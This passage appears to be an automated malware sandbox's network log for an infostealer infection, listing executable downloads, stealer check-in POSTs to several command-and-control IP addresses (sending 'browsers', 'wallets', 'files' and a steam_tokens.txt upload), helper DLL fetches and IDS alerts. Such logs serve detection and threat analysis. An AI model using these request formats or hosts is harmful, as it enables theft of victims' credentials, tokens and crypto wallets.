Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Fri, 06 Sep 2024 06:17:54 GMTContent-Type: application/octet-streamContent-Length: 301608Last-Modified: Thu, 05 Sep 2024 22:53:24 GMTConnection: keep-aliveETag: "66da3664-49a28"Accept-Ranges: bytesData Raw: [hex dump of the returned PE image (MZ header) omitted]
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Fri, 06 Sep 2024 06:17:55 GMTContent-Type: application/octet-streamContent-Length: 353832Last-Modified: Thu, 05 Sep 2024 22:29:59 GMTConnection: keep-aliveETag: "66da30e7-56628"Accept-Ranges: bytesData Raw: [hex dump of the returned PE image (MZ header) omitted]
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 06 Sep 2024 06:18:08 GMTContent-Type: application/octet-streamContent-Length: 2459136Last-Modified: Fri, 24 Nov 2023 13:43:06 GMTConnection: keep-aliveETag: "6560a86a-258600"Accept-Ranges: bytesData Raw: [hex dump of the returned PE image (MZ header) omitted]
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 06 Sep 2024 06:18:08 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: [hex dump of the returned PE image (MZ header) omitted]
Source: global traffic HTTP traffic detected: GET /fneogr HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1.exe HTTP/1.1Host: smkn2sumbawabesar.sch.idConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /fneogr HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=f3c4d6f56f5d888bd9_3268186582621973209
Source: global traffic HTTP traffic detected: GET /fneogr HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=f3c4d6f56f5d888bd9_3268186582621973209
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 46.8.231.109Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDGDAAKFHIEHIECAFBAAHost: 46.8.231.109Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------IDGDAAKFHIEHIECAFBAAContent-Disposition: form-data; name="hwid"3DC8325E8EB92925382193------IDGDAAKFHIEHIECAFBAAContent-Disposition: form-data; name="build"default------IDGDAAKFHIEHIECAFBAA--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBFHJEGDAFHIJKECFBKJHost: 46.8.231.109Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------EBFHJEGDAFHIJKECFBKJContent-Disposition: form-data; name="token"a98d1cb102ab61866e106f3004c65a26bbf52c2e0b4eb449d0dc7b151cca32a806bb940c------EBFHJEGDAFHIJKECFBKJContent-Disposition: form-data; name="message"browsers------EBFHJEGDAFHIJKECFBKJ--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBFBKFBGIIIDGDGCFCGIHost: 46.8.231.109Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------EBFBKFBGIIIDGDGCFCGIContent-Disposition: form-data; name="token"a98d1cb102ab61866e106f3004c65a26bbf52c2e0b4eb449d0dc7b151cca32a806bb940c------EBFBKFBGIIIDGDGCFCGIContent-Disposition: form-data; name="message"plugins------EBFBKFBGIIIDGDGCFCGI--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFCAKKKFBGDGCAKFCFHHost: 46.8.231.109Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------FBFCAKKKFBGDGCAKFCFHContent-Disposition: form-data; name="token"a98d1cb102ab61866e106f3004c65a26bbf52c2e0b4eb449d0dc7b151cca32a806bb940c------FBFCAKKKFBGDGCAKFCFHContent-Disposition: form-data; name="message"fplugins------FBFCAKKKFBGDGCAKFCFH--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAAAFBGDBKKEBGCFCBFHost: 46.8.231.109Content-Length: 7603Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKFHCFBGIIJKFHJDHDHHost: 46.8.231.109Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIIIDAFBFBKECBGDBGIHost: 46.8.231.109Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHIIIIEHCFIECAKFHJDHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------GDHIIIIEHCFIECAKFHJDContent-Disposition: form-data; name="token"a98d1cb102ab61866e106f3004c65a26bbf52c2e0b4eb449d0dc7b151cca32a806bb940c------GDHIIIIEHCFIECAKFHJDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GDHIIIIEHCFIECAKFHJDContent-Disposition: form-data; name="file"------GDHIIIIEHCFIECAKFHJD--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBKJDAFHJDGDHJKKEGIHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------JEBKJDAFHJDGDHJKKEGIContent-Disposition: form-data; name="token"a98d1cb102ab61866e106f3004c65a26bbf52c2e0b4eb449d0dc7b151cca32a806bb940c------JEBKJDAFHJDGDHJKKEGIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JEBKJDAFHJDGDHJKKEGIContent-Disposition: form-data; name="file"------JEBKJDAFHJDGDHJKKEGI--
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJKFCGHIDHCBGDHJKEBHost: 46.8.231.109Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJDHJKFIECAAKFIJJKJHost: 46.8.231.109Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------EHJDHJKFIECAAKFIJJKJContent-Disposition: form-data; name="token"a98d1cb102ab61866e106f3004c65a26bbf52c2e0b4eb449d0dc7b151cca32a806bb940c------EHJDHJKFIECAAKFIJJKJContent-Disposition: form-data; name="message"wallets------EHJDHJKFIECAAKFIJJKJ--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDGIJEGHDAECAKECAFCAHost: 46.8.231.109Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------IDGIJEGHDAECAKECAFCAContent-Disposition: form-data; name="token"a98d1cb102ab61866e106f3004c65a26bbf52c2e0b4eb449d0dc7b151cca32a806bb940c------IDGIJEGHDAECAKECAFCAContent-Disposition: form-data; name="message"files------IDGIJEGHDAECAKECAFCA--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHIDHIEGIIIECAKEBFBHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="token"a98d1cb102ab61866e106f3004c65a26bbf52c2e0b4eb449d0dc7b151cca32a806bb940c------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="file"------GDHIDHIEGIIIECAKEBFB--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIDBKJJDGHDHJKEHJDBHost: 46.8.231.109Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------FIIDBKJJDGHDHJKEHJDBContent-Disposition: form-data; name="token"a98d1cb102ab61866e106f3004c65a26bbf52c2e0b4eb449d0dc7b151cca32a806bb940c------FIIDBKJJDGHDHJKEHJDBContent-Disposition: form-data; name="message"ybncbhylepme------FIIDBKJJDGHDHJKEHJDB--
Source: global traffic HTTP traffic detected: GET /vjgg.exe HTTP/1.1Host: 46.29.235.52Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /lnef.exe HTTP/1.1Host: 46.29.235.52Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJJDAAECGHDGDGCGHDBHost: 46.8.231.109Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 44 41 41 45 43 47 48 44 47 44 47 43 47 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 38 64 31 63 62 31 30 32 61 62 36 31 38 36 36 65 31 30 36 66 33 30 30 34 63 36 35 61 32 36 62 62 66 35 32 63 32 65 30 62 34 65 62 34 34 39 64 30 64 63 37 62 31 35 31 63 63 61 33 32 61 38 30 36 62 62 39 34 30 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 44 41 41 45 43 47 48 44 47 44 47 43 47 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 44 41 41 45 43 47 48 44 47 44 47 43 47 48 44 42 2d 2d 0d 0a Data Ascii: ------JJJJDAAECGHDGDGCGHDBContent-Disposition: form-data; name="token"a98d1cb102ab61866e106f3004c65a26bbf52c2e0b4eb449d0dc7b151cca32a806bb940c------JJJJDAAECGHDGDGCGHDBContent-Disposition: form-data; name="message"wkkjqaiaxkhb------JJJJDAAECGHDGDGCGHDB--
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 147.45.126.10Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFHDBGIEBFIIDGCBFBKHost: 147.45.126.10Content-Length: 256Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 46 48 44 42 47 49 45 42 46 49 49 44 47 43 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 44 43 38 33 32 35 45 38 45 42 39 32 39 32 35 33 38 32 31 39 33 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 44 42 47 49 45 42 46 49 49 44 47 43 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 66 31 30 39 33 61 61 37 65 65 62 61 66 37 35 35 32 30 33 61 30 30 33 37 30 65 32 32 33 37 35 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 44 42 47 49 45 42 46 49 49 44 47 43 42 46 42 4b 2d 2d 0d 0a Data Ascii: ------DBFHDBGIEBFIIDGCBFBKContent-Disposition: form-data; name="hwid"3DC8325E8EB92925382193-a33c7340-61ca------DBFHDBGIEBFIIDGCBFBKContent-Disposition: form-data; name="build_id"4f1093aa7eebaf755203a00370e22375------DBFHDBGIEBFIIDGCBFBK--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDAEGHDGDBGDGDAAFIHost: 147.45.126.10Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 38 63 36 38 38 38 32 63 65 61 32 30 39 38 61 38 37 37 32 65 65 39 31 34 66 31 39 34 35 39 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 66 31 30 39 33 61 61 37 65 65 62 61 66 37 35 35 32 30 33 61 30 30 33 37 30 65 32 32 33 37 35 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 2d 2d 0d 0a Data Ascii: ------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="token"c28c68882cea2098a8772ee914f19459------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="build_id"4f1093aa7eebaf755203a00370e22375------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="mode"1------AFHDAEGHDGDBGDGDAAFI--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDAEGHDGDBGDGDAAFIHost: 147.45.126.10Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 38 63 36 38 38 38 32 63 65 61 32 30 39 38 61 38 37 37 32 65 65 39 31 34 66 31 39 34 35 39 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 66 31 30 39 33 61 61 37 65 65 62 61 66 37 35 35 32 30 33 61 30 30 33 37 30 65 32 32 33 37 35 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 2d 2d 0d 0a Data Ascii: ------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="token"c28c68882cea2098a8772ee914f19459------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="build_id"4f1093aa7eebaf755203a00370e22375------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="mode"2------AFHDAEGHDGDBGDGDAAFI--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDAECAEBKJJJKEBKKJDHost: 147.45.126.10Content-Length: 332Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 41 45 43 41 45 42 4b 4a 4a 4a 4b 45 42 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 38 63 36 38 38 38 32 63 65 61 32 30 39 38 61 38 37 37 32 65 65 39 31 34 66 31 39 34 35 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 41 45 43 41 45 42 4b 4a 4a 4a 4b 45 42 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 66 31 30 39 33 61 61 37 65 65 62 61 66 37 35 35 32 30 33 61 30 30 33 37 30 65 32 32 33 37 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 41 45 43 41 45 42 4b 4a 4a 4a 4b 45 42 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 41 45 43 41 45 42 4b 4a 4a 4a 4b 45 42 4b 4b 4a 44 2d 2d 0d 0a Data Ascii: ------KJDAECAEBKJJJKEBKKJDContent-Disposition: form-data; name="token"c28c68882cea2098a8772ee914f19459------KJDAECAEBKJJJKEBKKJDContent-Disposition: form-data; name="build_id"4f1093aa7eebaf755203a00370e22375------KJDAECAEBKJJJKEBKKJDContent-Disposition: form-data; name="mode"21------KJDAECAEBKJJJKEBKKJD--
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.100Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFBAFBFIEHIDBGDHCGIEHost: 185.215.113.100Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 42 41 46 42 46 49 45 48 49 44 42 47 44 48 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 44 43 38 33 32 35 45 38 45 42 39 32 39 32 35 33 38 32 31 39 33 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 41 46 42 46 49 45 48 49 44 42 47 44 48 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6c 65 76 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 41 46 42 46 49 45 48 49 44 42 47 44 48 43 47 49 45 2d 2d 0d 0a Data Ascii: ------CFBAFBFIEHIDBGDHCGIEContent-Disposition: form-data; name="hwid"3DC8325E8EB92925382193------CFBAFBFIEHIDBGDHCGIEContent-Disposition: form-data; name="build"leva------CFBAFBFIEHIDBGDHCGIE--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCAAEBKEGHJKEBFHJDBHost: 185.215.113.100Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 33 63 64 61 30 65 62 66 37 36 37 33 31 31 61 66 30 34 62 33 39 37 65 65 61 31 33 62 33 64 31 30 61 36 32 35 65 38 36 38 65 39 66 32 66 64 38 65 35 34 37 36 61 66 37 66 37 31 64 32 38 31 62 63 34 62 66 37 65 62 35 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 2d 2d 0d 0a Data Ascii: ------DHCAAEBKEGHJKEBFHJDBContent-Disposition: form-data; name="token"73cda0ebf767311af04b397eea13b3d10a625e868e9f2fd8e5476af7f71d281bc4bf7eb5------DHCAAEBKEGHJKEBFHJDBContent-Disposition: form-data; name="message"browsers------DHCAAEBKEGHJKEBFHJDB--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJDGIEHCAEHIEBFBKKKHost: 185.215.113.100Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 33 63 64 61 30 65 62 66 37 36 37 33 31 31 61 66 30 34 62 33 39 37 65 65 61 31 33 62 33 64 31 30 61 36 32 35 65 38 36 38 65 39 66 32 66 64 38 65 35 34 37 36 61 66 37 66 37 31 64 32 38 31 62 63 34 62 66 37 65 62 35 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 2d 2d 0d 0a Data Ascii: ------AKJDGIEHCAEHIEBFBKKKContent-Disposition: form-data; name="token"73cda0ebf767311af04b397eea13b3d10a625e868e9f2fd8e5476af7f71d281bc4bf7eb5------AKJDGIEHCAEHIEBFBKKKContent-Disposition: form-data; name="message"plugins------AKJDGIEHCAEHIEBFBKKK--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDGCGDBGCAAEBFIECGHHost: 185.215.113.100Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 33 63 64 61 30 65 62 66 37 36 37 33 31 31 61 66 30 34 62 33 39 37 65 65 61 31 33 62 33 64 31 30 61 36 32 35 65 38 36 38 65 39 66 32 66 64 38 65 35 34 37 36 61 66 37 66 37 31 64 32 38 31 62 63 34 62 66 37 65 62 35 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 2d 2d 0d 0a Data Ascii: ------HJDGCGDBGCAAEBFIECGHContent-Disposition: form-data; name="token"73cda0ebf767311af04b397eea13b3d10a625e868e9f2fd8e5476af7f71d281bc4bf7eb5------HJDGCGDBGCAAEBFIECGHContent-Disposition: form-data; name="message"fplugins------HJDGCGDBGCAAEBFIECGH--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKEBFCFIJJKKECAKJEHDHost: 185.215.113.100Content-Length: 7271Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFBGCAKFHCFHJKECFIIDHost: 147.45.126.10Content-Length: 7069Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sql.dll HTTP/1.1Host: 147.45.126.10Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
Source: unknown DNS query: name: api64.ipify.org
Source: unknown DNS query: name: ipinfo.io
Source: unknown DNS query: name: iplogger.org
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49736 -> 46.29.235.52:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49735 -> 46.29.235.52:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49737 -> 147.45.44.104:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49734 -> 176.113.115.33:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49733 -> 147.45.44.104:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49739 -> 31.41.244.9:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49742 -> 176.111.174.109:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49753 -> 46.8.231.109:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49775 -> 46.29.235.52:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49781 -> 185.215.113.100:80
Source: Network traffic Suricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.4:64650 -> 1.1.1.1:53
